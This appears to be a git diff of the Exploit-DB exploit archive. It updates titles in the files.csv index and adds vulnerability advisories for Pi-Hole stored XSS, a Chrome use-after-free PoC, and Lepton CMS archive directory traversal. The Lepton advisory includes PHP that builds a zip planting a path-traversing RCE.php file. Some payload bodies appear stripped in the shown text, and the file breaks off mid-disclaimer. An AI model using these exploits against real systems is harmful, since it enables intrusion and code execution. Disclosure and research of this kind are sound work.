diff --git a/files.csv b/files.csv index acfa9fa77..046e7b2c4 100755 --- a/files.csv +++ b/files.csv @@ -1575,20 +1575,20 @@ id,file,description,date,author,platform,type,port 1864,platforms/php/webapps/1864.txt,"ashNews 0.83 - (pathtoashnews) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 1865,platforms/php/webapps/1865.txt,"Informium 0.12.0 - (common-menu.php) Remote File Inclusion",2006-06-02,Kacper,php,webapps,0 1866,platforms/php/webapps/1866.txt,"PHP-Nuke 7.9 Final (phpbb_root_path) Remote File Inclusions",2006-06-02,ddoshomo,php,webapps,0 -1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service Exploit",2006-06-02,n00b,multiple,dos,0 +1867,platforms/multiple/dos/1867.html,"Mozilla Firefox 1.5.0.4 - (marquee) Denial of Service",2006-06-02,n00b,multiple,dos,0 1868,platforms/php/webapps/1868.php,"Pixelpost 1-5rc1-2 - Remote Privilege Escalation Exploit",2006-06-03,rgod,php,webapps,0 1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote Inclusion Exploit",2006-06-03,rgod,php,webapps,0 1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0 1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - (catid) SQL Injection",2006-06-03,FarhadKey,asp,webapps,0 -1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection / Admin Credentials Disclosure Exploit",2006-06-03,rgod,php,webapps,0 +1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - Multiple Vulnerabilities",2006-06-03,rgod,php,webapps,0 1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - (profile.php) Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0 1876,platforms/php/webapps/1876.pl,"SCart 2.0 - (page) Remote Code Execution Exploit",2006-06-04,K-159,php,webapps,0 1877,platforms/php/webapps/1877.php,"Claroline 1.7.6 - (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0 1878,platforms/php/webapps/1878.txt,"Particle Wiki 1.0.2 - SQL Injection",2006-06-05,FarhadKey,php,webapps,0 1879,platforms/php/webapps/1879.txt,"dotWidget CMS 1.0.6 - (file_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 -1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit",2006-06-05,"ECL Labs",linux,dos,0 +1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote Denial of Service",2006-06-05,"ECL Labs",linux,dos,0 1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - (da_path) Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0 1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a (edit.php) Remote Password Disclosure Exploit",2006-06-05,DarkFig,php,webapps,0 1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - (wk_lang.php) Remote File Inclusion",2006-06-06,Kacper,php,webapps,0 @@ -1598,13 +1598,13 @@ id,file,description,date,author,platform,type,port 1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - (post.php) Remote File Inclusion",2006-06-07,Kacper,php,webapps,0 1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - (jpcache.php) Remote Include",2006-06-08,"Federico Fazzi",php,webapps,0 1889,platforms/hardware/remote/1889.txt,"D-Link Access-Point 2.10na - (DWL Series) Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0 -1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 -1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote Include",2006-06-08,Kacper,php,webapps,0 +1890,platforms/php/webapps/1890.txt,"CMS-Bandits 2.5 - (spaw_root) Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0 +1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems 1.1 - (footer) Remote File Inclusion",2006-06-08,Kacper,php,webapps,0 1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 - (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0 1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise 2.0 - (ASP) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0 -1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0 -1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote Include",2006-06-10,Kacper,php,webapps,0 -1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote Include",2006-06-10,Kacper,php,webapps,0 +1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash PoC",2006-06-09,"Federico Fazzi",linux,dos,0 +1895,platforms/php/webapps/1895.txt,"empris r20020923 - (phormationdir) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0 +1896,platforms/php/webapps/1896.txt,"aePartner 0.8.3 - (dir[data]) Remote File Inclusion",2006-06-10,Kacper,php,webapps,0 1897,platforms/php/webapps/1897.txt,"phpOnDirectory 1.0 - Remote File Inclusion",2006-06-10,Kacper,php,webapps,0 1898,platforms/php/webapps/1898.txt,"WebprojectDB 0.1.3 - (INCDIR) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 1899,platforms/php/webapps/1899.txt,"free QBoard 1.1 - (qb_path) Remote File Inclusion",2006-06-11,Kacper,php,webapps,0 @@ -1644,8 +1644,8 @@ id,file,description,date,author,platform,type,port 1933,platforms/php/webapps/1933.txt,"BandSite CMS 1.1.1 - (root_path) Remote File Inclusion",2006-06-20,Kw3[R]Ln,php,webapps,0 1934,platforms/php/webapps/1934.txt,"dotProject 2.0.3 - (baseDir) Remote File Inclusion",2006-06-20,h4ntu,php,webapps,0 1935,platforms/windows/dos/1935.cpp,"Winamp 5.21 - (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0 -1936,platforms/php/webapps/1936.txt,"SmartSiteCMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0 -1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0 +1936,platforms/php/webapps/1936.txt,"SmartSite CMS 1.0 - (root) Remote File Inclusion",2006-06-20,Archit3ct,php,webapps,0 +1937,platforms/multiple/dos/1937.html,"Opera 9 - (long href) Remote Denial of Service",2006-06-21,N9,multiple,dos,0 1938,platforms/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0 1939,platforms/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection Exploit (PHP)",2006-06-21,RusH,php,webapps,0 1940,platforms/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow Exploit (MS06-025) (Metasploit)",2006-06-22,"H D Moore",windows,remote,445 @@ -1653,9 +1653,9 @@ id,file,description,date,author,platform,type,port 1942,platforms/php/webapps/1942.txt,"ralf image gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,php,webapps,0 1943,platforms/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,php,webapps,0 1944,platforms/windows/local/1944.c,"Microsoft Excel Unspecified Remote Code Execution Exploit",2006-06-22,"naveed afzal",windows,local,0 -1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion Exploit",2006-06-22,the_day,php,webapps,0 +1945,platforms/php/webapps/1945.pl,"w-Agora 4.2.0 - (inc_dir) Remote File Inclusion",2006-06-22,the_day,php,webapps,0 1946,platforms/php/webapps/1946.php,"Jaws 0.6.2 - (Search gadget) SQL Injection Exploit",2006-06-23,rgod,php,webapps,0 -1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final do_hook() Remote Denial of Service Exploit",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0 +1947,platforms/multiple/dos/1947.c,"BitchX 1.1-final - do_hook() Remote Denial of Service",2006-06-24,"Federico L. Bossi Bonin",multiple,dos,0 1948,platforms/php/webapps/1948.txt,"phpMySms 2.0 - (ROOT_PATH) Remote File Inclusion",2006-06-24,Persian-Defacer,php,webapps,0 1949,platforms/windows/dos/1949.pl,"XM Easy Personal FTP Server 5.0.1 - (Port) Remote Overflow PoC",2006-06-24,"Jerome Athias",windows,dos,0 1950,platforms/php/webapps/1950.pl,"MyBulletinBoard (MyBB) 1.1.3 - (usercp.php) Create Admin Exploit",2006-06-25,Hessam-x,php,webapps,0 @@ -1668,7 +1668,7 @@ id,file,description,date,author,platform,type,port 1957,platforms/php/webapps/1957.pl,"Scout Portal Toolkit 1.4.0 - (forumid) SQL Injection Exploit",2006-06-27,simo64,php,webapps,0 1958,platforms/windows/local/1958.pl,"Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit",2006-06-27,FistFuXXer,windows,local,0 1959,platforms/php/webapps/1959.txt,"RsGallery2 <= 1.11.2 - (rsgallery.html.php) File Include",2006-06-28,marriottvn,php,webapps,0 -1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k SQL Injection Exploit",2006-06-28,rgod,php,webapps,0 +1960,platforms/php/webapps/1960.php,"BLOG:CMS 4.0.0k - SQL Injection",2006-06-28,rgod,php,webapps,0 1961,platforms/php/webapps/1961.txt,"XOOPS myAds Module (lid) SQL Injection",2006-06-28,KeyCoder,php,webapps,0 1962,platforms/osx/local/1962.pl,"Mac OS X 10.4.6 - (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0 1963,platforms/php/webapps/1963.txt,"GeekLog 1.4.0sr3 - (_CONF[path]) Remote File Inclusion",2006-06-29,Kw3[R]Ln,php,webapps,0 @@ -3739,7 +3739,7 @@ id,file,description,date,author,platform,type,port 4087,platforms/linux/remote/4087.c,"BitchX 1.1-final (EXEC) Remote Command Execution Exploit",2007-06-21,clarity_,linux,remote,0 4089,platforms/php/webapps/4089.pl,"SerWeb 0.9.4 - (load_lang.php) Remote File Inclusion Exploit",2007-06-21,Kw3[R]Ln,php,webapps,0 4090,platforms/php/webapps/4090.pl,"Powl 0.94 - (htmledit.php) Remote File Inclusion",2007-06-22,Kw3[R]Ln,php,webapps,0 -4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0 +4091,platforms/php/webapps/4091.txt,"Sun Board 1.00.00 alpha - Remote File Inclusion",2007-06-22,GoLd_M,php,webapps,0 4092,platforms/php/webapps/4092.txt,"netclassifieds - (SQL/XSS/full path) Multiple Vulnerabilities",2007-06-22,"laurent gaffié ",php,webapps,0 4093,platforms/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow Exploit",2007-06-22,eliteboy,multiple,remote,80 4094,platforms/windows/remote/4094.html,"BarCode ActiveX Control BarCodeAx.dll 4.9 - Remote Overflow Exploit",2007-06-22,callAX,windows,remote,0 @@ -7528,7 +7528,7 @@ id,file,description,date,author,platform,type,port 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 -8001,platforms/php/webapps/8001.txt,"Mailist 3.0 Insecure Backup/Local File Inclusion",2009-02-06,SirGod,php,webapps,0 +8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup/Local File Inclusion",2009-02-06,SirGod,php,webapps,0 8002,platforms/php/webapps/8002.txt,"CafeEngine - (index.php catid) SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with RFI (c99) Exploit",2009-02-06,JosS,php,webapps,0 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - (Auth Bypass/LFI/RCE) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0 @@ -12348,7 +12348,7 @@ id,file,description,date,author,platform,type,port 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0 14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0 14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0 -14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0 +14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0 14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna - LFI",2010-06-24,MISTERFRIBO,php,webapps,0 14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0 14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL injection",2010-06-24,Sangteamtham,php,webapps,0 @@ -20898,8 +20898,8 @@ id,file,description,date,author,platform,type,port 23680,platforms/php/webapps/23680.php,"PHP-Nuke 6.x - Category Parameter SQL Injection",2003-12-23,pokleyzz,php,webapps,0 23681,platforms/windows/dos/23681.pl,"EvolutionX Multiple Remote Buffer Overflow Vulnerabilities",2004-02-10,Moth7,windows,dos,0 23682,platforms/linux/local/23682.c,"XFree86 4.3 Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0 -23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 -23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 +23683,platforms/php/webapps/23683.txt,"VisualShapers ezContents 1.x/2.0 - db.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 +23684,platforms/php/webapps/23684.txt,"VisualShapers ezContents 1.x/2.0 - archivednews.php Arbitrary File Inclusion",2004-02-11,"Cedric Cochin",php,webapps,0 23685,platforms/php/webapps/23685.txt,"BosDev BosDates 3.x - SQL Injection",2004-02-11,G00db0y,php,webapps,0 23696,platforms/asp/webapps/23696.pl,"ASP Portal - Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0 23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x - info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0 @@ -22367,7 +22367,7 @@ id,file,description,date,author,platform,type,port 25223,platforms/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",php,webapps,0 25224,platforms/php/webapps/25224.txt,"SimpGB 1.0 Guestbook.php SQL Injection",2005-03-14,visus,php,webapps,0 25225,platforms/php/webapps/25225.txt,"PHPAdsNew 2.0.4 AdFrame.php Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",php,webapps,0 -25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0 +25226,platforms/php/webapps/25226.txt,"VoteBox 2.0 - Votebox.php Remote File Inclusion",2005-03-14,SmOk3,php,webapps,0 25227,platforms/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 PoC_loginform.php phpbb_root_path Parameter Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25228,platforms/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 PoC.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 25229,platforms/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 ENGLISH_poc.php Remote File Inclusion",2005-03-15,"Albania Security Clan",php,webapps,0 @@ -22384,7 +22384,7 @@ id,file,description,date,author,platform,type,port 25240,platforms/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 register.php login Parameter SQL Injection",2005-03-19,Romano,php,webapps,0 25241,platforms/php/webapps/25241.html,"PHP-Fusion 4/5 Setuser.php HTML Injection",2005-03-19,"PersianHacker Team",php,webapps,0 25242,platforms/php/webapps/25242.txt,"Ciamos 0.9.2 Highlight.php File Disclosure",2005-03-19,"Majid NT",php,webapps,0 -25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0 +25243,platforms/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,php,webapps,0 25244,platforms/php/webapps/25244.txt,"CzarNews 1.13/1.14 headlines.php Remote File Inclusion",2005-03-21,brOmstar,php,webapps,0 25245,platforms/php/webapps/25245.txt,"Social Site Generator 2.2 - CSRF Add Admin Exploit",2013-05-06,Fallaga,php,webapps,0 25247,platforms/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,php,webapps,0 @@ -22401,7 +22401,7 @@ id,file,description,date,author,platform,type,port 25258,platforms/php/webapps/25258.txt,"Phorum 3.x/5.0.x - HTTP Response Splitting",2005-03-22,"Alexander Anisimov",php,webapps,0 25259,platforms/windows/dos/25259.py,"Microsoft Windows XP Local Denial of Service",2005-03-22,liquid@cyberspace.org,windows,dos,0 25260,platforms/php/webapps/25260.txt,"Vortex Portal 2.0 - index.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 -25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 +25261,platforms/php/webapps/25261.txt,"Vortex Portal 2.0 - content.php act Parameter Remote File Inclusion",2005-03-23,"Francisco Alisson",php,webapps,0 25262,platforms/php/webapps/25262.txt,"InterSpire ArticleLive 2005 NewComment Cross-Site Scripting",2005-03-23,mircia,php,webapps,0 25263,platforms/php/webapps/25263.txt,"DigitalHive 2.0 msg.php XSS",2005-03-23,"benji lemien",php,webapps,0 25264,platforms/php/webapps/25264.txt,"DigitalHive 2.0 membres.php mt Parameter XSS",2005-03-23,"benji lemien",php,webapps,0 @@ -27370,7 +27370,7 @@ id,file,description,date,author,platform,type,port 30476,platforms/ios/webapps/30476.txt,"Song Exporter 2.1.1 RS iOS - Local File Inclusion",2013-12-24,Vulnerability-Lab,ios,webapps,80 30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Local Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0 30478,platforms/php/webapps/30478.txt,"php MBB CMS 004 - Multiple Vulnerabilities",2013-12-24,"cr4wl3r ",php,webapps,80 -30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 +30479,platforms/php/webapps/30479.txt,"Shoutbox 1.0 - Shoutbox.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30480,platforms/php/webapps/30480.txt,"Bilder Galerie 1.0 - Index.php Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30481,platforms/php/webapps/30481.txt,"Web News 1.1 - index.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30482,platforms/php/webapps/30482.txt,"Web News 1.1 - feed.php config[root_ordner] Parameter Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 @@ -33637,7 +33637,7 @@ id,file,description,date,author,platform,type,port 37307,platforms/php/webapps/37307.txt,"phphq.Net phAlbum 1.5.1 - 'index.php' Cross-Site Scripting",2012-05-21,"Eyup CELIK",php,webapps,0 37308,platforms/php/webapps/37308.txt,"RuubikCMS 1.1.x - Cross-Site Scripting / Information Disclosure / Directory Traversal",2012-05-23,AkaStep,php,webapps,0 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0 -37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 +37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - module.php Multiple Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 modules.php URI XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter XSS",2012-05-23,"High-Tech Bridge SA",php,webapps,0 @@ -36386,9 +36386,19 @@ id,file,description,date,author,platform,type,port 40234,platforms/windows/remote/40234.py,"Easy FTP Server 1.7.0.11 - 'APPE' Command Buffer Overflow Remote Exploit",2012-03-03,Swappage,windows,remote,0 40235,platforms/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote,0 40236,platforms/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,ruby,webapps,80 -40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x_ 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0 -40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013_2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0 +40237,platforms/php/webapps/40237.txt,"Zabbix 2.2.x / 3.0.x - SQL Injection",2016-08-15,1n3,php,webapps,0 +40238,platforms/multiple/dos/40238.txt,"Microsoft Office Word 2013/2016 - sprmSdyaTop Denial of Service (MS16-099)",2016-08-16,COSIG,multiple,dos,0 40239,platforms/jsp/webapps/40239.txt,"WSO2 Identity Server 5.1.0 - Multiple Vulnerabilities",2016-08-16,hyp3rlinx,jsp,webapps,0 40240,platforms/jsp/webapps/40240.txt,"WSO2 Carbon 4.4.5 - Local File Inclusion",2016-08-16,hyp3rlinx,jsp,webapps,9443 40241,platforms/jsp/webapps/40241.txt,"WSO2 Carbon 4.4.5 - Stored XSS",2016-08-16,hyp3rlinx,jsp,webapps,9443 40242,platforms/jsp/webapps/40242.txt,"WSO2 Carbon 4.4.5 - (Denial of Service) CSRF",2016-08-16,hyp3rlinx,jsp,webapps,9443 +40243,platforms/osx/dos/40243.html,"Google Chrome 26.0.1410.43 (Webkit) - OBJECT Element Use After Free PoC",2013-04-04,"Google Security Research",osx,dos,0 +40245,platforms/win_x86/shellcode/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 +40246,platforms/win_x86/shellcode/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 +40247,platforms/php/webapps/40247.txt,"Lepton CMS 2.2.0 / 2.2.1 - Directory Traversal",2016-08-16,hyp3rlinx,php,webapps,80 +40248,platforms/php/webapps/40248.txt,"Lepton CMS 2.2.0 / 2.2.1 - PHP Code Injection",2016-08-16,hyp3rlinx,php,webapps,80 +40249,platforms/linux/webapps/40249.txt,"Pi-Hole Web Interface 2.8.1 - Stored XSS in Whitelist/Blacklist",2016-08-16,loneferret,linux,webapps,0 +40250,platforms/php/webapps/40250.txt,"Nagios Log Server 1.4.1 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0 +40251,platforms/php/webapps/40251.txt,"Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0 +40252,platforms/php/webapps/40252.txt,"Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,php,webapps,0 +40253,platforms/windows/dos/40253.html,"Internet Explorer - MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal Read AV",2016-08-16,"Google Security Research",windows,dos,0 diff --git a/platforms/linux/webapps/40249.txt b/platforms/linux/webapps/40249.txt new file mode 100755 index 000000000..3d957dd13 --- /dev/null +++ b/platforms/linux/webapps/40249.txt @@ -0,0 +1,50 @@ +# Exploit Title: Pi-Hole Web Interface Stored XSS in White/Black list file +# Author: loneferret from Kioptrix +# Product: Pi-Hole +# Version: Web Interface 1.3 +# Web Interface software: https://github.com/pi-hole/AdminLTE +# Version: Pi-Hole v2.8.1 +# Discovery date: July 20th 2016 +# Vendor Site: https://pi-hole.net +# Software Download: https://github.com/pi-hole/pi-hole +# Tested on: Ubuntu 14.04 +# Solution: Update to next version. + +# Software description: +# The Pi-hole is an advertising-aware DNS/Web server. If an ad domain is queried, +# a small Web page or GIF is delivered in place of the advertisement. +# You can also replace ads with any image you want since it is just a simple +# Webpage taking place of the ads. + +# Note: Not much of a vulnerability, implies you already have access +# to the box to begin with. Still best to use good coding practices, +# and avoid such things. + +# Vulnerability PoC: Stored XSS +# Insert this: +# +# In either /etc/pihole/blacklist.txt || /etc/pihole/whitelist.txt +# +# Then navigate to: +# http://pi-hole-server/admin/list.php?l=white +# or +# http://pi-hole-server/admin/list.php?l=black +# +# And a pop-up will appear. + +# Disclosure timeline: +# July 20th 2016: Sent initial email to author. +# July 21st 2016: Response, bug has been forwarded to web dev people +# July 22nd 2016: Asked to be kept up to date on fix +# July 27th 2016: Author replied saying he shall +# July 28th 2016: - Today I had chocolat milk - +# August 3rd 2016: Reply saying there's a fix, waiting on "Mark" to confirm +# August 3rd 2106: Supplies URL to fix from Github https://github.com/pi-hole/AdminLTE/pull/120 +# August 4th 2016: Thanked him for fix, informed him of a lame LFI in the web interface as well. +# August 4th 2016: - While drinking my coffee, I realize my comments are longer than the actual PoC. - +# August 10th 2016: Still nothing +# August 12th 2016: Submitting this is taking too much time to integrate their fix + +-- +Notice: This email does not mean I'm consenting to receiving promotional +emails/spam/etc. Remember Canada has laws. diff --git a/platforms/osx/dos/40243.html b/platforms/osx/dos/40243.html new file mode 100755 index 000000000..47b556da7 --- /dev/null +++ b/platforms/osx/dos/40243.html @@ -0,0 +1,104 @@ +#---object-beforeload-chrome.html---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# + +
+ + + + + + +#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# + + + + + +#---object-beforeload-frame-chrome.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# + + + + + + +#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# + +## E-DB Note: Source ~ https://bugs.chromium.org/p/chromium/issues/detail?id=226696 \ No newline at end of file diff --git a/platforms/php/webapps/40247.txt b/platforms/php/webapps/40247.txt new file mode 100755 index 000000000..ab6111234 --- /dev/null +++ b/platforms/php/webapps/40247.txt @@ -0,0 +1,98 @@ +[+] Credits: John Page (HYP3RLINX) + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt + +[+] ISR: ApparitionSec + + +Vendor: +================== +www.lepton-cms.org + + +Product: +================================= +Lepton CMS 2.2.0 / 2.2.1 (update) + +LEPTON is an easy-to-use but full customizable Content Management System (CMS). + + +Vulnerability Type: +============================ +Archive Directory Traversal + + +CVE Reference: +============== +N/A + + +Vulnerability Details: +===================== + +Lepton has feature that lets users install new modules, if malicious user uploads an archive and the module is not valid it +will generate an error. However, the malicious archive will still get decompressed and no check is made for ../ characters in +the file name allowing in arbitrary PHP files to be placed outside the intended target directory for installed modules. This can +then be used to execute remote commands on the affected host system. + +e.g. + +We get error message as below. + +under "Add Ons" tab Install Module. +Invalid LEPTON installation file. Please check the *.zip format.[1] + +Archive still gets decompressed and the malicious file is moved outside of the intended target directory, by using ../ in file name. + + +Exploit code(s): +=============== + +";exit();} +$file_name=$argv[1]; + +$zip = new ZipArchive(); +$res = $zip->open("$file_name.zip", ZipArchive::CREATE); +$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", ''); +$zip->close(); + +echo "Malicious archive created...\r\n"; +echo "========= hyp3rlinx ============"; +?> + + +Disclosure Timeline: +=========================================================== +Attempted Vendor Notification: June 11, 2016 (No replies) +Vendor Notification on July 12, 2016 ( thanks Henri Salo ) +Vendor Acknowledgement: July 13, 2016 +Vendor fixes: July 14, 2016 +Vendor release version 2.2.2 : August 12, 2016 +August 15, 2016 : Public Disclosure + + +Exploitation Technique: +======================= +Local + + +Severity Level: +================ +High + + +[+] Disclaimer +The information 